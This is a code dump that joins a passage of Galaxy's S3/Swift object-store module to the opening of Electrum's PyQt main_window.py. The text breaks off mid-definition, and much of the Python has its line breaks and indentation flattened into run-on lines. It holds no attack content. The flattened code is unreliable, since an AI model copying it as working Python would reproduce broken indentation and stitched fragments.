convert_bytes(deleted_amount), convert_bytes(delete_this_much))) else: log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount)) return def _get_bucket(self, bucket_name): """Sometimes a handle to a bucket is not established right away so try it a few times. 
Raise error is connection is not established.""" for i in range(5): try: bucket = self.conn.get_bucket(bucket_name) log.debug("Using cloud object store with bucket '%s'", bucket.name) return bucket except S3ResponseError: try: log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name) self.conn.create_bucket(bucket_name) except S3ResponseError: log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1) time.sleep(2) # All the attempts have been exhausted and connection was not established, # raise error raise S3ResponseError def _fix_permissions(self, rel_path): """Set permissions on rel_path""" for basedir, _, files in os.walk(rel_path): umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid) for filename in files: path = os.path.join(basedir, filename) # Ignore symlinks if os.path.islink(path): continue umask_fix_perms(path, self.config.umask, 0o666, self.config.gid) def _construct_path( self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs, ): # extra_dir should never be constructed from provided data but just # make sure there are no shenannigans afoot if extra_dir and extra_dir != os.path.normpath(extra_dir): log.warning("extra_dir is not normalized: %s", extra_dir) raise ObjectInvalid("The requested object is invalid") # ensure that any parent directory references in alt_name would not # result in a path not contained in the directory path constructed here if alt_name: if not safe_relpath(alt_name): log.warning("alt_name would locate path outside dir: %s", alt_name) raise ObjectInvalid("The requested object is invalid") # alt_name can contain parent directory references, but S3 will not # follow them, so if they are valid we normalize them out alt_name = os.path.normpath(alt_name) rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # for JOB_WORK directory if obj_dir: rel_path = os.path.join(rel_path, str(self._get_object_id(obj))) if base_dir: base = self.extra_dirs.get(base_dir) return os.path.join(base, rel_path) # S3 folders are marked by having trailing '/' so add it now rel_path = f"{rel_path}/" if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat") return rel_path def _get_cache_path(self, rel_path): return os.path.abspath(os.path.join(self.staging_path, rel_path)) def _get_transfer_progress(self): return self.transfer_progress def _get_size_in_s3(self, rel_path): try: key = self._bucket.get_key(rel_path) if key: return key.size except S3ResponseError: log.exception("Could not get size of key '%s' from S3", rel_path) return -1 def _key_exists(self, rel_path): exists = False try: # A hackish way of testing if the rel_path is a folder vs a file is_dir = rel_path[-1] == "/" if is_dir: keyresult = self._bucket.get_all_keys(prefix=rel_path) if len(keyresult) > 0: exists = True else: exists = False else: key = Key(self._bucket, rel_path) exists = key.exists() except S3ResponseError: log.exception("Trouble checking existence of S3 key '%s'", rel_path) return False return exists def _in_cache(self, rel_path): """Check if the given dataset is in the local cache and return True if so.""" # log.debug("------ Checking cache for rel_path %s" % rel_path) cache_path = self._get_cache_path(rel_path) return os.path.exists(cache_path) # TODO: Part of 
checking if a file is in cache should be to ensure the # size of the cached file matches that on S3. Once the upload tool explicitly # creates, this check sould be implemented- in the mean time, it's not # looking likely to be implementable reliably. # if os.path.exists(cache_path): # # print("***1 %s exists" % cache_path) # if self._key_exists(rel_path): # # print("***2 %s exists in S3" % rel_path) # # Make sure the size in cache is available in its entirety # # print("File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))) # if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path): # # print("***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path) # exists = True # else: # # print("***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path) # exists = False # else: # # Although not perfect decision making, this most likely means # # that the file is currently being uploaded # # print("***3 %s found in cache but not in S3 (in_cache=True)" % cache_path) # exists = True # else: # return False def _pull_into_cache(self, rel_path): # Ensure the cache directory structure exists (e.g., dataset_#_files/) rel_path_dir = os.path.dirname(rel_path) if not os.path.exists(self._get_cache_path(rel_path_dir)): os.makedirs(self._get_cache_path(rel_path_dir)) # Now pull in the file file_ok = self._download(rel_path) self._fix_permissions(self._get_cache_path(rel_path_dir)) return file_ok def _transfer_cb(self, complete, total): self.transfer_progress += 10 def _download(self, rel_path): try: log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) key = self._bucket.get_key(rel_path) # Test if cache is large enough to hold the new file if self.cache_size > 0 and key.size > self.cache_size: log.critical( "File %s is larger (%s) than the cache size (%s). Cannot download.", rel_path, key.size, self.cache_size, ) return False if self.use_axel: log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) ncores = multiprocessing.cpu_count() url = key.generate_url(7200) ret_code = subprocess.call(["axel", "-a", "-n", str(ncores), url]) if ret_code == 0: return True else: log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) self.transfer_progress = 0 # Reset transfer progress counter key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10) return True except S3ResponseError: log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self._bucket.name) return False def _push_to_os(self, rel_path, source_file=None, from_string=None): """ Push the file pointed to by ``rel_path`` to the object store naming the key ``rel_path``. If ``source_file`` is provided, push that file instead while still using ``rel_path`` as the key name. If ``from_string`` is provided, set contents of the file to the value of the string. 
""" try: source_file = source_file if source_file else self._get_cache_path(rel_path) if os.path.exists(source_file): key = Key(self._bucket, rel_path) if os.path.getsize(source_file) == 0 and key.exists(): log.debug( "Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path ) return True if from_string: key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr) log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path) else: start_time = datetime.now() log.debug( "Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path, ) mb_size = os.path.getsize(source_file) / 1e6 if mb_size < 10 or (not self.multipart): self.transfer_progress = 0 # Reset transfer progress counter key.set_contents_from_filename( source_file, reduced_redundancy=self.use_rr, cb=self._transfer_cb, num_cb=10 ) else: multipart_upload(self.s3server, self._bucket, key.name, source_file, mb_size) end_time = datetime.now() log.debug( "Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)", source_file, rel_path, os.path.getsize(source_file), end_time - start_time, ) return True else: log.error( "Tried updating key '%s' from source file '%s', but source file does not exist.", rel_path, source_file, ) except S3ResponseError: log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file) raise return False def file_ready(self, obj, **kwargs): """ A helper method that checks if a file corresponding to a dataset is ready and available to be used. Return ``True`` if so, ``False`` otherwise. """ rel_path = self._construct_path(obj, **kwargs) # Make sure the size in cache is available in its entirety if self._in_cache(rel_path): if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path): return True log.debug( "Waiting for dataset %s to transfer from OS: %s/%s", rel_path, os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path), ) return False def _exists(self, obj, **kwargs): in_cache = in_s3 = False rel_path = self._construct_path(obj, **kwargs) # Check cache if self._in_cache(rel_path): in_cache = True # Check S3 in_s3 = self._key_exists(rel_path) # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3)) # dir_only does not get synced so shortcut the decision dir_only = kwargs.get("dir_only", False) base_dir = kwargs.get("base_dir", None) if dir_only: if in_cache or in_s3: return True # for JOB_WORK directory elif base_dir: if not os.path.exists(rel_path): os.makedirs(rel_path) return True else: return False # TODO: Sync should probably not be done here. Add this to an async upload stack? 
if in_cache and not in_s3: self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path)) return True elif in_s3: return True else: return False def _create(self, obj, **kwargs): if not self._exists(obj, **kwargs): # Pull out locally used fields extra_dir = kwargs.get("extra_dir", None) extra_dir_at_root = kwargs.get("extra_dir_at_root", False) dir_only = kwargs.get("dir_only", False) alt_name = kwargs.get("alt_name", None) # Construct hashed path rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) # Optionally append extra_dir if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # Create given directory in cache cache_dir = os.path.join(self.staging_path, rel_path) if not os.path.exists(cache_dir): os.makedirs(cache_dir) # Although not really necessary to create S3 folders (because S3 has # flat namespace), do so for consistency with the regular file system # S3 folders are marked by having trailing '/' so add it now # s3_dir = '%s/' % rel_path # self._push_to_os(s3_dir, from_string='') # If instructed, create the dataset in cache & in S3 if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat") open(os.path.join(self.staging_path, rel_path), "w").close() self._push_to_os(rel_path, from_string="") def _empty(self, obj, **kwargs): if self._exists(obj, **kwargs): return bool(self._size(obj, **kwargs) > 0) else: raise ObjectNotFound("objectstore.empty, object does not exist: %s, kwargs: %s" % (str(obj), str(kwargs))) def _size(self, obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) if self._in_cache(rel_path): try: return os.path.getsize(self._get_cache_path(rel_path)) except OSError as ex: log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex) elif self._exists(obj, **kwargs): return self._get_size_in_s3(rel_path) log.warning("Did not find dataset '%s', returning 0 for size", rel_path) return 0 def _delete(self, obj, entire_dir=False, **kwargs): rel_path = self._construct_path(obj, **kwargs) extra_dir = kwargs.get("extra_dir", None) base_dir = kwargs.get("base_dir", None) dir_only = kwargs.get("dir_only", False) obj_dir = kwargs.get("obj_dir", False) try: # Remove temparory data in JOB_WORK directory if base_dir and dir_only and obj_dir: shutil.rmtree(os.path.abspath(rel_path)) return True # For the case of extra_files, because we don't have a reference to # individual files/keys we need to remove the entire directory structure # with all the files in it. This is easy for the local file system, # but requires iterating through each individual key in S3 and deleing it. 
if entire_dir and extra_dir: shutil.rmtree(self._get_cache_path(rel_path), ignore_errors=True) results = self._bucket.get_all_keys(prefix=rel_path) for key in results: log.debug("Deleting key %s", key.name) key.delete() return True else: # Delete from cache first unlink(self._get_cache_path(rel_path), ignore_errors=True) # Delete from S3 as well if self._key_exists(rel_path): key = Key(self._bucket, rel_path) log.debug("Deleting key %s", key.name) key.delete() return True except S3ResponseError: log.exception("Could not delete key '%s' from S3", rel_path) except OSError: log.exception("%s delete error", self._get_filename(obj, **kwargs)) return False def _get_data(self, obj, start=0, count=-1, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Check cache first and get file if not there if not self._in_cache(rel_path): self._pull_into_cache(rel_path) # Read the file content from cache data_file = open(self._get_cache_path(rel_path)) data_file.seek(start) content = data_file.read(count) data_file.close() return content def _get_filename(self, obj, **kwargs): base_dir = kwargs.get("base_dir", None) dir_only = kwargs.get("dir_only", False) obj_dir = kwargs.get("obj_dir", False) rel_path = self._construct_path(obj, **kwargs) # for JOB_WORK directory if base_dir and dir_only and obj_dir: return os.path.abspath(rel_path) cache_path = self._get_cache_path(rel_path) # S3 does not recognize directories as files so cannot check if those exist. # So, if checking dir only, ensure given dir exists in cache and return # the expected cache path. # dir_only = kwargs.get('dir_only', False) # if dir_only: # if not os.path.exists(cache_path): # os.makedirs(cache_path) # return cache_path # Check if the file exists in the cache first if self._in_cache(rel_path): return cache_path # Check if the file exists in persistent storage and, if it does, pull it into cache elif self._exists(obj, **kwargs): if dir_only: # Directories do not get pulled into cache return cache_path else: if self._pull_into_cache(rel_path): return cache_path # For the case of retrieving a directory only, return the expected path # even if it does not exist. # if dir_only: # return cache_path raise ObjectNotFound("objectstore.get_filename, no cache_path: %s, kwargs: %s" % (str(obj), str(kwargs))) # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path def _update_from_file(self, obj, file_name=None, create=False, **kwargs): if create: self._create(obj, **kwargs) if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Chose whether to use the dataset file itself or an alternate file if file_name: source_file = os.path.abspath(file_name) # Copy into cache cache_file = self._get_cache_path(rel_path) try: if source_file != cache_file: # FIXME? Should this be a `move`? 
shutil.copy2(source_file, cache_file) self._fix_permissions(cache_file) except OSError: log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file) else: source_file = self._get_cache_path(rel_path) # Update the file on S3 self._push_to_os(rel_path, source_file) else: raise ObjectNotFound( "objectstore.update_from_file, object does not exist: %s, kwargs: %s" % (str(obj), str(kwargs)) ) def _get_object_url(self, obj, **kwargs): if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) try: key = Key(self._bucket, rel_path) return key.generate_url(expires_in=86400) # 24hrs except S3ResponseError: log.exception("Trouble generating URL for dataset '%s'", rel_path) return None def _get_store_usage_percent(self): return 0.0 def shutdown(self): self.running = False thread = getattr(self, "cache_monitor_thread", None) if thread: log.debug("Shutting down thread") self.sleeper.wake() thread.join(5) class SwiftObjectStore(S3ObjectStore): """ Object store that stores objects as items in a Swift bucket. A local cache exists that is used as an intermediate location for files between Galaxy and Swift. """ store_type = "swift" def _configure_connection(self): log.debug("Configuring Swift Connection") self.conn = boto.connect_s3( aws_access_key_id=self.access_key, aws_secret_access_key=self.secret_key, is_secure=self.is_secure, host=self.host, port=self.port, calling_format=boto.s3.connection.OrdinaryCallingFormat(), path=self.conn_path, )
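
# Illustrative sketch: parse_config_xml above pulls its settings from an XML
# element with <auth>, <bucket>, optional <connection>, <cache> and one or
# more <extra_dir> children. The fragment below is a placeholder example of
# that layout (all attribute values and the root element name are
# assumptions, not taken from a real deployment).
from xml.etree import ElementTree

EXAMPLE_S3_XML = """<object_store type="s3">
    <auth access_key="ACCESS_KEY" secret_key="SECRET_KEY"/>
    <bucket name="my-galaxy-bucket" use_reduced_redundancy="False" max_chunk_size="250"/>
    <connection host="s3.example.org" port="6000" multipart="True" is_secure="True" conn_path="/"/>
    <cache path="database/object_store_cache" size="100"/>
    <extra_dir type="job_work" path="database/job_working_directory_s3"/>
    <extra_dir type="temp" path="database/tmp_s3"/>
</object_store>"""

# Round-trip through the parser defined above:
# config_dict = parse_config_xml(ElementTree.fromstring(EXAMPLE_S3_XML))
# config_dict["bucket"]["name"]  -> "my-galaxy-bucket"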
main_window.py
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union

from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
                             QMenuBar, QFileDialog, QCheckBox, QLabel,
                             QVBoxLayout, QGridLayout, QLineEdit,
                             QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
                             QShortcut, QMainWindow, QCompleter, QInputDialog,
                             QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
                             QMenu, QAction, QStackedWidget, QToolButton)

import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
                      paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time, UserCancelled, profiler, bh2u, bfh,
                           InvalidPassword, UserFacingException,
                           get_new_wallet_name, send_exception_to_crash_reporter,
                           InvalidBitcoinURI, maybe_extract_bolt11_invoice,
                           NotEnoughFunds, NoDynamicFeeEstimates,
                           MultipleSpendMaxTxOutputs, AddTransactionException,
                           BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
                                  PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
                             sweep_preparations, InternalAddressCorruption,
                             CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
                              UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException

from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
                   WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
                   OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
                   CloseButton, HelpButton, MessageBoxMixin, EnterButton,
                   import_meta_gui, export_meta_gui,
                   filename_field, address_field, char_width_in_lineedit, webopen,
                   TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
                   getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
from .rbf_dialog import BumpFeeDialog, DSCancelDialog

if TYPE_CHECKING:
    from . import ElectrumGui

LN_NUM_PAYMENT_ATTEMPTS = 10


class StatusBarButton(QToolButton):
    # note: this class has a custom stylesheet applied in stylesheet_patcher.py
    def __init__(self, icon, tooltip, func):
        QToolButton.__init__(self)
        self.setText('')
        self.setIcon(icon)
        self.setToolTip(tooltip)
        self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.setAutoRaise(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25, 25))
        self.setCursor(QCursor(Qt.PointingHandCursor))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        if e.key() in [Qt.Key_Return, Qt.Key_Enter]:
            self.func()


def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        parent = self.top_level_window()
        password = None
        while self.wallet.has_keystore_encryption():
            password = self.password_dialog(parent=parent)
            if password is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(password)
                break
            except Exception as e:
                self.show_error(str(e), parent=parent)
                continue

        kwargs['password'] = password
        return func(self, *args, **kwargs)
    return request_password


class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):

    payment_request_ok_signal = pyqtSignal()
    payment_request_error_signal = pyqtSignal()
    network_signal = pyqtSignal(str, object)
    #ln_payment_attempt_signal = pyqtSignal(str)
    alias_received_signal = pyqtSignal()
    computing_privkeys_signal = pyqtSignal()
    show_privkeys_signal = pyqtSignal()
    show_error_signal = pyqtSignal(str)

    payment_request: Optional[paymentrequest.PaymentRequest]

    def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        assert wallet, "no wallet"
        self.wallet = wallet
        if wallet.has_lightning():
            self.wallet.config.set_key('show_channels_tab', True)

        self.setup_exception_hook()

        self.network = gui_object.daemon.network  # type: Network
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.payto_URI = None
        self.checking_accounts = False
        self.qr_window = None
        self.pluginsdialog = None
        self.showing_cert_mismatch_error = False
        self.tl_windows = []
        self.pending_invoice = None
        Logger.__init__(self)

        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0

        self.create_status_bar()
        self.need_update = threading.Event()

        self.completions = QStringListModel()

        coincontrol_sb = self.create_coincontrol_statusbar()

        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        self.channels_tab = self.create_channels_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))

        def add_optional_tab(tabs, tab, icon, description, name):
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))

        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")

        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)

        central_widget = QWidget()
        vbox = QVBoxLayout(central_widget)
        vbox.setContentsMargins(0, 0, 0, 0)
        vbox.addWidget(tabs)
        vbox.addWidget(coincontrol_sb)
        self.setCentralWidget(central_widget)

        if self.config.get("is_maximized"):
            self.showMaximized()

        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()

        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self,
                  lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1) % wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self,
                  lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1) % wrtabs.count()))

        for i in range(wrtabs.count()):
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self,
                      lambda i=i: wrtabs.setCurrentIndex(i))

        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.show_error_signal.connect(self.show_error)
        self.history_list.setFocus(True)

        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status', 'banner', 'verified',
                         'fee', 'fee_histogram', 'on_quotes', 'on_history',
                         'channel', 'channels_updated', 'payment_failed',
                         'payment_succeeded', 'invoice_status', 'request_status',
                         'ln_gossip_sync_progress', 'cert_mismatch', 'gossip_db_loaded']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            util.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)

        # update fee slider in case we missed the callback
        #self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()

        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = self.question(title="Electrum - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum available?"))
            config.set_key('check_updates', bool(choice), save=True)

        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread() self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def setup_exception_hook(self): Exception_Hook.maybe_setup(config=self.config, wallet=self.wallet) def run_coroutine_from_thread(self, coro, on_result=None): def task(): try: f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) r = f.result() if on_result: on_result(r) except Exception as e: self.logger.exception("exception in coro scheduled via window.wallet") self.show_error_signal.emit(str(e)) self.wallet.thread.add(task) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: # TODO would be nice if we just sent these to the crash reporter... 
# anything we don't want to send there, we should explicitly catch # send_exception_to_crash_reporter(e) try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(repr(e)) def on_network(self, event, *args): # Handle in GUI thread self.network_signal.emit(event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread # note: all windows get events from all wallets! if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event == 'on_quotes': self.on_fx_quotes() elif event == 'on_history': self.on_fx_history() elif event == 'gossip_db_loaded': self.channels_list.gossip_db_loaded.emit(*args) elif event == 'channels_updated': wallet = args[0] if wallet == self.wallet: self.channels_list.update_rows.emit(*args) elif event == 'channel': wallet = args[0] if wallet == self.wallet: self.channels_list.update_single_row.emit(*args) self.update_status() elif event == 'request_status': self.on_request_status(*args) elif event == 'invoice_status': self.on_invoice_status(*args) elif event == 'payment_succeeded': wallet = args[0] if wallet == self.wallet: self.on_payment_succeeded(*args) elif event == 'payment_failed': wallet = args[0] if wallet == self.wallet: self.on_payment_failed(*args) elif event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': pass elif event == 'fee_histogram': self.history_model.on_fee_histogram() elif event == 'ln_gossip_sync_progress': self.update_lightning_icon() elif event == 'cert_mismatch': self.show_cert_mismatch_error() else: self.logger.info(f"unexpected network event: {event} {args}") def 